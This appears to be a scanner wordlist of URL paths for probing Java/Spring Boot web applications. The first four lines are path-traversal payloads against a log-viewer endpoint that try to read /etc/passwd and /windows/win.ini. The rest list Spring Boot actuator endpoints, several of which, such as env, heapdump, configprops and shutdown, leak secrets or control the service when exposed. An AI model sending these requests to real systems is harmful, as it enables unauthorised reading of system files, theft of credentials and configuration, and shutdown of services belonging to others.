/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/actuator
/actuator/health
/actuator/info
/actuator/env
/actuator/metrics
/actuator/logfile
/actuator/mappings
/actuator/trace
/actuator/threaddump
/actuator/heapdump
/actuator/auditevents
/actuator/beans
/actuator/configprops
/actuator/scheduledtasks
/actuator/httptrace
/actuator/caches
/actuator/conditions
/actuator/sessions
/actuator/refresh
/actuator/restart
/actuator/shutdown
/actuator/flyway
/actuator/liquibase
/actuator/serviceregistry
/actuator/bindings
/actuator/integrationgraph
/actuator/heap
